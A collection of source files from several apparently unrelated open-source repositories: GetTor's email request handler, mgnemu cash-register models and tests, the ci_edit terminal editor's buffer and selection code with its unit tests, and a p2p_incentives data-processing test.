req['type'] = 'links'
found_os = True
break
elif re.match("checksum", word, re.IGNORECASE):
req['type'] = 'checksums'
req['os'] = None
found_checksums = True
break
else:
break
return req
def _create_email(self, from_addr, to_addr, subject, msg):
"""Create an email object.
This object will be used to construct the reply.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
:param: subject (string) the subject of the email.
:param: msg (string) the content of the email.
:return: (object) the email object.
"""
email_obj = MIMEText(msg)
email_obj.set_charset("utf-8")
email_obj['Subject'] = subject
email_obj['From'] = from_addr
email_obj['To'] = to_addr
return email_obj
def _send_email(self, from_addr, to_addr, subject, msg):
"""Send an email.
Take a 'from' and 'to' addresses, a subject and the content, creates
the email and send it.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
:param: subject (string) the subject of the email.
:param: msg (string) the content of the email.
"""
email_obj = self._create_email(from_addr, to_addr, subject, msg)
try:
s = smtplib.SMTP("localhost")
s.sendmail(from_addr, to_addr, email_obj.as_string())
s.quit()
except smtplib.SMTPException as e:
raise SendEmailError("Error with SMTP: %s" % str(e))
def _send_links(self, links, lc, os, from_addr, to_addr):
"""Send links to the user.
Get the message in the proper language (according to the locale),
replace variables and send the email.
:param: links (string) the links to be sent.
:param: lc (string) the locale.
:param: os (string) the operating system.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
links_subject = self._get_msg('links_subject', lc)
links_msg = self._get_msg('links_msg', lc)
links_msg = links_msg % (os, lc, links)
try:
self._send_email(from_addr, to_addr, links_subject, links_msg)
except SendEmailError as e:
raise InternalError("Error while sending links message")
def _send_help(self, lc, from_addr, to_addr):
"""Send help message.
Get the message in the proper language (according to the locale),
replace variables (if any) and send the email.
:param: lc (string) the locale.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
help_subject = self._get_msg('help_subject', lc)
help_msg = self._get_msg('help_msg', lc)
try:
self._send_email(from_addr, to_addr, help_subject, help_msg)
except SendEmailError as e:
raise InternalError("Error while sending help message")
def _send_checksums(self, checksums, lc, from_addr, to_addr):
"""Send help message.
Get the message in the proper language (according to the locale),
replace variables (if any) and send the email.
:param: lc (string) the locale.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in the proper language and send it
checksums_subject = self._get_msg('checksums_subject', lc)
checksums_msg = self._get_msg('checksums_msg', lc)
checksums_msg = checksums_msg % checksums
try:
self._send_email(from_addr, to_addr, checksums_subject, checksums_msg)
except SendEmailError as e:
raise InternalError("Error while sending help message")
def _send_unsupported_lc(self, lc, os, from_addr, to_addr):
"""Send unsupported locale message.
Get the message for unsupported locale in english, replace variables
(if any) and send the email.
:param: lc (string) the locale.
:param: os (string) the operating system.
:param: from_addr (string) the address of the sender.
:param: to_addr (string) the address of the recipient.
"""
# obtain the content in english and send it
un_lc_subject = self._get_msg('unsupported_lc_subject', 'en')
un_lc_msg = self._get_msg('unsupported_lc_msg', 'en')
un_lc_msg = un_lc_msg % lc
try:
self._send_email(from_addr, to_addr, un_lc_subject, un_lc_msg)
except SendEmailError as e:
raise InternalError("Error while sending unsupported lc message")
def process_email(self, raw_msg):
"""Process the email received.
Create an email object from the string received. The processing
flow is as following:
- check for blacklisted address.
- parse the email.
- check the type of request.
- send reply.
:param: raw_msg (string) the email received.
:raise: InternalError if something goes wrong while asking for the
links to the Core module.
"""
parsed_msg = email.message_from_string(raw_msg)
content = self._get_content(parsed_msg)
from_addr = parsed_msg['From']
to_addr = parsed_msg['To']
bogus_request = False
status = ''
req = None
try:
# two ways for a request to be bogus: address malformed or
# blacklisted
try:
norm_from_addr = self._get_normalized_address(from_addr)
except AddressError as e:
status = 'malformed'
bogus_request = True
# it might be interesting to know what triggered this
# we are not logging this for now
# logfile = self._log_email('malformed', content)
if norm_from_addr:
anon_addr = utils.get_sha256(norm_from_addr)
if self._is_blacklisted(anon_addr):
status = 'blacklisted'
bogus_request = True
# it might be interesting to know extra info
# we are not logging this for now
# logfile = self._log_email(anon_addr, content)
if not bogus_request:
# try to figure out what the user is asking
req = self._parse_email(content, to_addr)
# our address should have the locale requested
our_addr = "gettor+%s@%s" % (req['lc'], self.our_domain)
# three possible options: asking for help, checksums or links
if req['type'] == 'help':
# make sure we can send emails
try:
self._send_help(req['lc'], our_addr, norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
raise InternalError("Something's wrong with the SMTP "
"server: %s" % str(e))
elif req['type'] == 'checksums':
try:
checksums = self.core.get_checksums(req['lc'])
except (core.InternalError, core.ConfigurationError) as e:
status = 'core_error'
# something went wrong with the core
raise InternalError("Error obtaining the checksums")
#make sure we can send emails
try:
self._send_checksums(checksums, req['lc'], our_addr, norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
raise InternalError("Something's wong with the SMTP "
"server: %s" % str(e))
elif req['type'] == 'links':
try:
links = self.core.get_links('SMTP', req['os'],
req['lc'])
except core.UnsupportedLocaleError as e:
# if we got here, the address of the sender should
# be valid so we send him/her a message about the
# unsupported locale
status = 'unsupported_lc'
self._send_unsupported_lc(req['lc'], req['os'],
our_addr, norm_from_addr)
return
# if core fails, we fail too
except (core.InternalError, core.ConfigurationError) as e:
status = 'core_error'
# something went wrong with the core
raise InternalError("Error obtaining the links")
# make sure we can send emails
try:
self._send_links(links, req['lc'], req['os'], our_addr,
norm_from_addr)
except SendEmailError as e:
status = 'internal_error'
raise SendEmailError("Something's wrong with the SMTP "
"server: %s" % str(e))
status = 'success'
finally:
# keep stats
if req:
self.core.add_request_to_db()
```
#### File: gettor/gettor/utils.py
```python
import os
import hashlib
"""Common utilities for GetTor modules."""
def get_sha256(string):
"""Get sha256 of a string.
:param: (string) the string to be hashed.
:return: (string) the sha256 of string.
"""
return str(hashlib.sha256(string).hexdigest())
``` |
{
"source": "0xporky/mgnemu",
"score": 3
} |
#### File: mgnemu/models/base_model.py
```python
from mgnemu.models.sales_types import SALES_TYPES
class BaseModel(object):
__id = 0
def __init__(self, model_type):
self.__type = model_type
if model_type in SALES_TYPES:
BaseModel.inc_id()
@staticmethod
def inc_id():
BaseModel.__id += 1
@staticmethod
def reset_id():
BaseModel.__id = 0
@staticmethod
def check_id():
return BaseModel.__id
@property
def model_type(self):
return self.__type
def dumps(self, object_data):
pass
def gen_check(self):
return {}
```
#### File: mgnemu/models/cash_operation.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.sales_types import CASH_RECIEPT
class CashOperation(BaseModel):
def __init__(self, data):
if CASH_RECIEPT in list(data.keys()):
BaseModel.__init__(self, CASH_RECIEPT)
else:
raise KeyError('Unknown check key error.')
self.__data = data[CASH_RECIEPT]
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: self.__data
}
def gen_check(self):
dump = self.dumps()
nums = [1 for cr in dump[CASH_RECIEPT]]
sums = [cr[CASH_RECIEPT]['sum']
for cr in dump[CASH_RECIEPT]]
return dict(zip(nums, sums))
```
#### File: mgnemu/models/check_comment.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.sales_types import COMMENT_TYPE
from mgnemu.models.sales_types import COMMENT
class CheckComment(BaseModel):
def __init__(self, data):
BaseModel.__init__(self, COMMENT_TYPE)
if COMMENT in list(data.keys()):
self.__cm = data[COMMENT]
else:
self.__cm = ''
@property
def cm(self):
return self.__cm
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: {
COMMENT: self.__cm,
}
}
```
#### File: mgnemu/models/check.py
```python
from mgnemu.models.base_model import BaseModel
from mgnemu.models.model_fabric import ModelFabric
from mgnemu.models.sales_types import SALES_RECIEPT
from mgnemu.models.sales_types import RETURN_RECIEPT
from mgnemu.models.sales_types import PAYMENT
class Check(BaseModel):
def __init__(self, data):
keys = list(data.keys())
if SALES_RECIEPT in keys:
BaseModel.__init__(self, SALES_RECIEPT)
elif RETURN_RECIEPT in keys:
BaseModel.__init__(self, RETURN_RECIEPT)
else:
raise KeyError('Unknown check key error')
fabric = ModelFabric()
self.__data = [fabric.get_model(val)
for val in data[self.model_type]
if fabric.get_model(val) is not None]
def gen_check(self):
dumps = self.dumps()
sign = 1
check_sum = 0
keys = list(dumps.keys())
if SALES_RECIEPT in keys:
dump = dumps[SALES_RECIEPT]
elif RETURN_RECIEPT in keys:
dump = dumps[RETURN_RECIEPT]
sign = -1
else:
return {}
nums = [cr[PAYMENT]['no']
for cr in dump
if PAYMENT in list(cr.keys())]
sums = [sign * cr[PAYMENT]['sum']
for cr in dump
if PAYMENT in list(cr.keys())]
return dict(zip(nums, sums))
@property
def check_type(self):
return self.model_type
def dumps(self):
return {
'id': BaseModel.check_id(),
self.model_type: [val.dumps() for val in self.__data]
}
```
#### File: mgnemu/models/model_fabric.py
```python
from mgnemu.models.discount import Discount
from mgnemu.models.payment_type import PaymentType
from mgnemu.models.check_line import CheckLine
from mgnemu.models.check_comment import CheckComment
from mgnemu.models.sales_types import DISCOUNT
from mgnemu.models.sales_types import CHECK_LINE
from mgnemu.models.sales_types import PAYMENT
from mgnemu.models.sales_types import COMMENT_TYPE
from mgnemu.models.sales_types import PAYMENT
class ModelFabric(object):
def __init__(self):
pass
def get_model(self, data):
keys = list(data.keys())
if DISCOUNT in keys:
return Discount(data[DISCOUNT])
elif CHECK_LINE in keys:
return CheckLine(data[CHECK_LINE])
elif PAYMENT in keys:
return PaymentType(data[PAYMENT])
elif COMMENT_TYPE in keys:
return CheckComment(data[COMMENT_TYPE])
else:
return None
```
#### File: mgnemu/tests/test_cash_operation.py
```python
from mgnemu.models.cash_operation import CashOperation
from unittest import TestCase
class TestCheckComment(TestCase):
def setUp(self):
self.json_data = {
'IO': [
{
'IO': {
'sum': 30
}
}
]
}
def test_loads_json(self):
model = CashOperation(self.json_data)
data_line = model.dumps()
dataIO = data_line['IO']
print(dataIO)
data_list = dataIO[0]
data = data_list['IO']
assert(data['sum'] == 30)
```
#### File: mgnemu/tests/test_payment_type.py
```python
from mgnemu.models.payment_type import PaymentType
from unittest import TestCase
class TestPaymentType(TestCase):
def setUp(self):
self.json_data = {
"sum": 1,
"no": 2,
"rrn": "3",
"card": "4"
}
def test_loads_json(self):
model = PaymentType(self.json_data)
assert(model.sum == 1)
assert(model.no == 2)
assert(model.rrn == '3')
assert(model.card == '4')
data_line = model.dumps()
data = data_line['P']
assert(data['sum'] == 1)
assert(data['no'] == 2)
assert(data['rrn'] == '3')
assert(data['card'] == '4')
``` |
{
"source": "0xPrateek/ci_edit",
"score": 2
} |
#### File: ci_edit/app/buffer_manager.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
try:
unicode
except NameError:
unicode = str # redefined-builtin
unichr = chr
import io
import os
import sys
import app.buffer_file
import app.config
import app.log
import app.history
import app.text_buffer
class BufferManager:
"""Manage a set of text buffers. Some text buffers may be hidden."""
def __init__(self, program, prefs):
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
self.program = program
self.prefs = prefs
# Using a dictionary lookup for buffers accelerates finding buffers by
# key (the file path), but that's not the common use. Maintaining an
# ordered list turns out to be more valuable.
self.buffers = []
def closeTextBuffer(self, textBuffer):
"""Warning this will throw away the buffer. Please be sure the user is
ok with this before calling."""
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
assert issubclass(textBuffer.__class__, app.text_buffer.TextBuffer)
self.untrackBuffer_(textBuffer)
def getUnsavedBuffer(self):
for fileBuffer in self.buffers:
if fileBuffer.isDirty():
return fileBuffer
return None
def newTextBuffer(self):
textBuffer = app.text_buffer.TextBuffer(self.program)
self.buffers.append(textBuffer)
app.log.info(textBuffer)
self.debugLog()
return textBuffer
def nextBuffer(self):
app.log.info()
self.debugLog()
if len(self.buffers):
return self.buffers[0]
return None
def topBuffer(self):
app.log.info()
self.debugLog()
if len(self.buffers):
return self.buffers[-1]
return None
def getValidTextBuffer(self, textBuffer):
"""If |textBuffer| is a managed buffer return it, otherwise create a new
buffer. Primarily used to determine if a held reference to a textBuffer
is still valid."""
if textBuffer in self.buffers:
del self.buffers[self.buffers.index(textBuffer)]
self.buffers.append(textBuffer)
return textBuffer
textBuffer = app.text_buffer.TextBuffer(self.program)
self.buffers.append(textBuffer)
return textBuffer
def loadTextBuffer(self, relPath):
if app.config.strict_debug:
assert issubclass(self.__class__, BufferManager), self
assert isinstance(relPath, unicode), type(relPath)
fullPath = app.buffer_file.expandFullPath(relPath)
app.log.info(fullPath)
textBuffer = None
for i, tb in enumerate(self.buffers):
if tb.fullPath == fullPath:
textBuffer = tb
del self.buffers[i]
self.buffers.append(tb)
break
app.log.info(u'Searched for textBuffer', repr(textBuffer))
if not textBuffer:
if os.path.isdir(fullPath):
app.log.info(u'Tried to open directory as a file', fullPath)
return
if not os.path.isfile(fullPath):
app.log.info(u'creating a new file at\n ', fullPath)
textBuffer = app.text_buffer.TextBuffer(self.program)
textBuffer.setFilePath(fullPath)
textBuffer.fileLoad()
self.buffers.append(textBuffer)
if 0:
self.debugLog()
return textBuffer
def debugLog(self):
bufferList = u''
for i in self.buffers:
bufferList += u'\n ' + repr(i.fullPath)
bufferList += u'\n ' + repr(i)
bufferList += u'\n dirty: ' + str(i.isDirty())
app.log.info(u'BufferManager' + bufferList)
def readStdin(self):
app.log.info(u'reading from stdin')
# Create a new input stream for the file data.
# Fd is short for file descriptor. os.dup and os.dup2 will duplicate
# file descriptors.
stdinFd = sys.stdin.fileno()
newFd = os.dup(stdinFd)
newStdin = io.open(u"/dev/tty")
os.dup2(newStdin.fileno(), stdinFd)
# Create a text buffer to read from alternate stream.
textBuffer = self.newTextBuffer()
try:
with io.open(newFd, u"r") as fileInput:
textBuffer.fileFilter(fileInput.read())
except Exception as e:
app.log.exception(e)
app.log.info(u'finished reading from stdin')
return textBuffer
def untrackBuffer_(self, fileBuffer):
app.log.debug(fileBuffer.fullPath)
self.buffers.remove(fileBuffer)
def fileClose(self, path):
pass
```
#### File: ci_edit/app/selectable.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import re
import app.config
import app.line_buffer
import app.log
import app.regex
# No selection.
kSelectionNone = 0
# Entire document selected.
kSelectionAll = 1
# A rectangular block selection.
kSelectionBlock = 2
# Character by character selection.
kSelectionCharacter = 3
# Select whole lines.
kSelectionLine = 4
# Select whole words.
kSelectionWord = 5
# How many selection modes are there.
kSelectionModeCount = 6
kSelectionModeNames = [
'None',
'All',
'Block',
'Char',
'Line',
'Word',
]
class Selectable(app.line_buffer.LineBuffer):
def __init__(self, program):
app.line_buffer.LineBuffer.__init__(self, program)
# When a text document is not line wrapped then each row will represent
# one line in the document, thow rows are zero based and lines are one
# based. With line wrapping enabled there may be more rows than lines
# since a line may wrap into multiple rows.
self.penRow = 0
# When a text document contains only ascii characters then each char
# (character) will represent one column in the text line (col is zero
# based and the column displayed in the UI is one based). When double
# wide character are present then a line of text will have more columns
# than characters.
# (penChar is not currently used).
self.penChar = 0
# When a text document contains only ascii characters then each column
# will represent one column in the text line (col is zero based and
# column displayed in the UI is one based).
self.penCol = 0
self.markerRow = 0
self.markerCol = 0
self.selectionMode = kSelectionNone
def countSelected(self):
lines = self.getSelectedText()
chars = len(lines) - 1 # Count carriage returns.
for line in lines:
chars += len(line)
return chars, len(lines)
def selection(self):
return (self.penRow, self.penCol, self.markerRow, self.markerCol)
def selectionModeName(self):
return kSelectionModeNames[self.selectionMode]
def getSelectedText(self):
upperRow, upperCol, lowerRow, lowerCol = self.startAndEnd()
return self.getText(upperRow, upperCol, lowerRow, lowerCol,
self.selectionMode)
def getText(self,
upperRow,
upperCol,
lowerRow,
lowerCol,
selectionMode=kSelectionCharacter):
if app.config.strict_debug:
assert isinstance(upperRow, int)
assert isinstance(upperCol, int)
assert isinstance(lowerRow, int)
assert isinstance(lowerCol, int)
assert isinstance(selectionMode, int)
assert upperRow <= lowerRow
assert upperRow != lowerRow or upperCol <= lowerCol
assert kSelectionNone <= selectionMode < kSelectionModeCount
lines = []
if selectionMode == kSelectionBlock:
if (lowerRow + 1 < self.parser.rowCount()):
lowerRow += 1
for i in range(upperRow, lowerRow):
lines.append(self.parser.rowText(i, upperCol, lowerCol))
elif (selectionMode == kSelectionAll or
selectionMode == kSelectionCharacter or
selectionMode == kSelectionLine or
selectionMode == kSelectionWord):
if upperRow == lowerRow:
lines.append(self.parser.rowText(upperRow, upperCol, lowerCol))
else:
for i in range(upperRow, lowerRow + 1):
if i == upperRow:
lines.append(self.parser.rowText(i, upperCol))
elif i == lowerRow:
lines.append(self.parser.rowText(i, 0, lowerCol))
else:
lines.append(self.parser.rowText(i))
return tuple(lines)
def doDeleteSelection(self):
"""Call doDelete() with current pen and marker values."""
upperRow, upperCol, lowerRow, lowerCol = self.startAndEnd()
self.doDelete(upperRow, upperCol, lowerRow, lowerCol)
def doDelete(self, upperRow, upperCol, lowerRow, lowerCol):
"""Delete characters from (upperRow, upperCol) up to (lowerRow,
lowerCol) using the current selection mode."""
if app.config.strict_debug:
assert isinstance(upperRow, int)
assert isinstance(upperCol, int)
assert isinstance(lowerRow, int)
assert isinstance(lowerCol, int)
assert upperRow <= lowerRow
assert upperRow != lowerRow or upperCol <= lowerCol
if self.selectionMode == kSelectionBlock:
self.parser.deleteBlock(upperRow, upperCol, lowerRow, lowerCol)
elif (self.selectionMode == kSelectionNone or
self.selectionMode == kSelectionAll or
self.selectionMode == kSelectionCharacter or
self.selectionMode == kSelectionLine or
self.selectionMode == kSelectionWord):
self.parser.deleteRange(upperRow, upperCol, lowerRow, lowerCol)
def insertLines(self, lines):
if app.config.strict_debug:
assert isinstance(lines, tuple)
self.insertLinesAt(self.penRow, self.penCol, lines, self.selectionMode)
def insertLinesAt(self, row, col, lines, selectionMode):
if app.config.strict_debug:
assert isinstance(row, int)
assert isinstance(col, int)
assert isinstance(lines, tuple)
assert isinstance(selectionMode, int)
if len(lines) <= 1:
if len(lines) == 0 or len(lines[0]) == 0:
# Optimization. There's nothing to insert.
return
lines = list(lines)
if selectionMode == kSelectionBlock:
self.parser.insertBlock(row, col, lines)
elif (selectionMode == kSelectionNone or
selectionMode == kSelectionAll or
selectionMode == kSelectionCharacter or
selectionMode == kSelectionLine or
selectionMode == kSelectionWord):
if len(lines) == 1:
self.parser.insert(row, col, lines[0])
else:
self.parser.insertLines(row, col, lines)
else:
app.log.info('selection mode not recognized', selectionMode)
def __extendWords(self, upperRow, upperCol, lowerRow, lowerCol):
"""Extends and existing selection to the nearest word boundaries. The
pen and marker will be extended away from each other. The extension may
occur in one, both, or neither direction.
Returns: tuple of (upperCol, lowerCol).
"""
line = self.parser.rowText(upperRow)
for segment in re.finditer(app.regex.kReWordBoundary, line):
if segment.start() <= upperCol < segment.end():
upperCol = segment.start()
break
line = self.parser.rowText(lowerRow)
for segment in re.finditer(app.regex.kReWordBoundary, line):
if segment.start() < lowerCol < segment.end():
lowerCol = segment.end()
break
return upperCol, lowerCol
def extendSelection(self):
"""Expand the current selection to fit the selection mode. E.g. if the
pen in the middle of a word, selection word will extend the selection to
the left and right so that the whole word is selected.
Returns: tuple of (penRow, penCol, markerRow, markerCol, selectionMode)
which are the delta values to accomplish the selection mode.
"""
if self.selectionMode == kSelectionNone:
return (0, 0, -self.markerRow, -self.markerCol, 0)
elif self.selectionMode == kSelectionAll:
lowerRow = self.parser.rowCount() - 1
lowerCol = self.parser.rowWidth(-1)
return (lowerRow - self.penRow,
lowerCol - self.penCol, -self.markerRow,
-self.markerCol, 0)
elif self.selectionMode == kSelectionLine:
return (0, -self.penCol, 0, -self.markerCol, 0)
elif self.selectionMode == kSelectionWord:
if self.penRow > self.markerRow or (self.penRow == self.markerRow
and
self.penCol > self.markerCol):
upperCol, lowerCol = self.__extendWords(
self.markerRow, self.markerCol, self.penRow, self.penCol)
return (0, lowerCol - self.penCol, 0, upperCol - self.markerCol,
0)
else:
upperCol, lowerCol = self.__extendWords(
self.penRow, self.penCol, self.markerRow, self.markerCol)
return (0, upperCol - self.penCol, 0, lowerCol - self.markerCol,
0)
return (0, 0, 0, 0, 0)
def startAndEnd(self):
"""Get the marker and pen pair as the earlier of the two then the later
of the two. The result accounts for the current selection mode."""
upperRow = 0
upperCol = 0
lowerRow = 0
lowerCol = 0
if self.selectionMode == kSelectionNone:
upperRow = self.penRow
upperCol = self.penCol
lowerRow = self.penRow
lowerCol = self.penCol
elif self.selectionMode == kSelectionAll:
upperRow = 0
upperCol = 0
lowerRow = self.parser.rowCount() - 1
lowerCol = self.parser.rowWidth(-1)
elif self.selectionMode == kSelectionBlock:
upperRow = min(self.markerRow, self.penRow)
upperCol = min(self.markerCol, self.penCol)
lowerRow = max(self.markerRow, self.penRow)
lowerCol = max(self.markerCol, self.penCol)
elif (self.selectionMode == kSelectionCharacter or
self.selectionMode == kSelectionLine or
self.selectionMode == kSelectionWord):
upperRow = self.markerRow
upperCol = self.markerCol
lowerRow = self.penRow
lowerCol = self.penCol
if upperRow == lowerRow and upperCol > lowerCol:
upperCol, lowerCol = lowerCol, upperCol
elif upperRow > lowerRow:
upperRow, lowerRow = lowerRow, upperRow
upperCol, lowerCol = lowerCol, upperCol
#app.log.detail('start and end', upperRow, upperCol, lowerRow, lowerCol)
return (upperRow, upperCol, lowerRow, lowerCol)
```
#### File: ci_edit/app/unit_test_selectable.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import unittest
import app.log
import app.ci_program
import app.selectable
class SelectableTestCases(unittest.TestCase):
def setUp(self):
self.selectable = app.selectable.Selectable(app.ci_program.CiProgram())
app.log.shouldWritePrintLog = True
def tearDown(self):
self.selectable = None
def test_default_values(self):
selectable = self.selectable
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
def test_selection_none(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionNone
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_all(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionAll
self.assertEqual(selectable.extendSelection(), (2, 4, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (2, 1, 0, 0, 0))
def test_selection_block(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionBlock
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_character(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionCharacter
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
def test_selection_line(self):
selectable = self.selectable
selectable.parser.data = u"one two\n\nfive"
selectable.parseDocument()
selectable.penRow = 1
selectable.selectionMode = app.selectable.kSelectionLine
app.log.debug(u"selectable.extendSelection",
selectable.extendSelection())
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penRow = 3
selectable.penCol = 3
selectable.markerRow = 1
selectable.markerCol = 4
self.assertEqual(selectable.extendSelection(), (0, -3, 0, -4, 0))
def test_selection_word(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionWord
selectable.penRow = 1
selectable.penCol = 2
self.assertEqual(selectable.extendSelection(), (0, 5, 0, 0, 0))
selectable.penRow = 1
selectable.penCol = 9
selectable.markerCol = 2
self.assertEqual(selectable.extendSelection(), (0, 3, 0, -2, 0))
# Deletion tests.
def test_deletion_none(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionNone
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"one two\nSeveral test words.\nfive")
def test_deletion_all(self):
selectable = self.selectable
def applySelection(args):
selectable.penRow += args[0]
selectable.penCol += args[1]
selectable.markerRow += args[2]
selectable.markerCol += args[3]
selectable.selectionMode += args[4]
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
self.assertEqual(selectable.selection(), (0, 0, 0, 0))
selectable.selectionMode = app.selectable.kSelectionAll
self.assertEqual(selectable.extendSelection(), (2, 4, 0, 0, 0))
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (2, 1, 0, 0, 0))
applySelection(selectable.extendSelection())
self.assertEqual(selectable.selection(), (2, 4, 0, 0))
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"")
selectable.insertLinesAt(0, 0, (u"wx", u"", u"yz"),
app.selectable.kSelectionAll)
self.assertEqual(selectable.parser.data, u"wx\n\nyz")
def test_deletion_block(self):
selectable = self.selectable
selectable.parser.data = u"oneTwo\n\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionBlock
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.markerRow = 0
selectable.markerCol = 1
selectable.penRow = 2
selectable.penCol = 3
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
self.assertEqual(selectable.parser.data, u"oneTwo\n\nfive")
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"oTwo\n\nfe")
selectable.insertLinesAt(0, 1, (u"wx", u"", u"yz"),
app.selectable.kSelectionBlock)
self.assertEqual(selectable.parser.data, u"owxTwo\n\nfyze")
def test_deletion_character(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionCharacter
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"ne two\nSeveral test words.\nfive")
selectable.markerCol = 3
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data,
u"ntwo\nSeveral test words.\nfive")
selectable.penRow = 1
selectable.penCol = 1
selectable.doDeleteSelection()
self.assertEqual(selectable.parser.data, u"ntweveral test words.\nfive")
def test_deletion_line(self):
selectable = self.selectable
selectable.parser.data = u"one two\n\nfive"
selectable.parseDocument()
selectable.penRow = 1
selectable.selectionMode = app.selectable.kSelectionLine
app.log.debug(u"selectable.extendSelection",
selectable.extendSelection())
self.assertEqual(selectable.extendSelection(), (0, 0, 0, 0, 0))
selectable.penRow = 3
selectable.penCol = 3
selectable.markerRow = 1
selectable.markerCol = 4
self.assertEqual(selectable.extendSelection(), (0, -3, 0, -4, 0))
def test_deletion_word(self):
selectable = self.selectable
selectable.parser.data = u"one two\nSeveral test words.\nfive"
selectable.parseDocument()
selectable.selectionMode = app.selectable.kSelectionWord
selectable.penRow = 1
selectable.penCol = 2
self.assertEqual(selectable.extendSelection(), (0, 5, 0, 0, 0))
selectable.penRow = 1
selectable.penCol = 9
selectable.markerCol = 2
self.assertEqual(selectable.extendSelection(), (0, 3, 0, -2, 0))
if __name__ == "__main__":
unittest.main()
```
#### File: 0xPrateek/ci_edit/setup.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from setuptools import setup
from setuptools import find_packages
from datetime import datetime
import io
import os
here = os.path.abspath(os.path.dirname(__file__))
def get_long_description():
# Read the long-description from a file.
with io.open(os.path.join(here, 'readme.md'), encoding='utf-8') as f:
return '\n' + f.read()
setup(
name='ci_edit',
version=datetime.strftime(datetime.today(), "%Y%m%d"),
description='A terminal text editor with mouse support and ctrl+Q to quit.',
long_description=get_long_description(),
long_description_content_type='text/markdown',
maintainer='<NAME>',
maintainer_email='<EMAIL>',
url='https://github.com/google/ci_edit',
classifiers=[
"Programming Language :: Python :: 3",
"Environment :: Console",
"Environment :: Console :: Curses",
"License :: OSI Approved :: Apache Software License",
"Topic :: Text Editors",
],
packages=find_packages(),
scripts=['ci.py'],
license='Apache 2.0',
)
``` |
{
"source": "0xProject/p2p_incentives",
"score": 3
} |
#### File: test/data_processing/test_calculate_density.py
```python
from typing import List, Tuple
import pytest
from data_processing import calculate_density
from data_types import InvalidInputError
from .__init__ import SATISFACTORY_LIST
# test normal cases
CASES_CALCULATE_DENSITY: List[Tuple[List[List[float]], float, List[float]]] = [
# satisfactory_list, division_unit, result
(
[
SATISFACTORY_LIST[0],
SATISFACTORY_LIST[1],
SATISFACTORY_LIST[2],
SATISFACTORY_LIST[3],
],
0.1,
[0.1, 0.1, 0.2, 0, 0.1, 0, 0.1, 0, 0.2, 0.1, 0.1],
),
([SATISFACTORY_LIST[0], SATISFACTORY_LIST[1]], 0.5, [4 / 9, 4 / 9, 1 / 9]),
]
@pytest.mark.parametrize(
"satisfactory_list, division_unit, expected_output", CASES_CALCULATE_DENSITY
)
def test_calculate_density__normal(
satisfactory_list: List[List[float]],
division_unit: float,
expected_output: List[float],
) -> None:
"""
This function tests calculate_density() with normal inputs.
:param satisfactory_list: first input in calculate_density()
:param division_unit: second input in calculate_density()
:param expected_output: expected output.
:return: None
"""
actual_output: List[float] = calculate_density(satisfactory_list, division_unit)
assert actual_output == pytest.approx(expected_output)
# test exceptions
def test_calculate_density__no_input() -> None:
"""
This function tests calculate_density() with empty input.
:return: None
"""
with pytest.raises(InvalidInputError):
calculate_density([], 0.1)
def test_calculate_density__no_value() -> None:
"""
This function tests calculate_density() with non-empty input, but every list in the input is
empty.
:return: None
"""
with pytest.raises(ValueError, match="There is no data in any input lists."):
calculate_density([[], []], 0.1)
def test_calculate_density__out_of_range() -> None:
"""
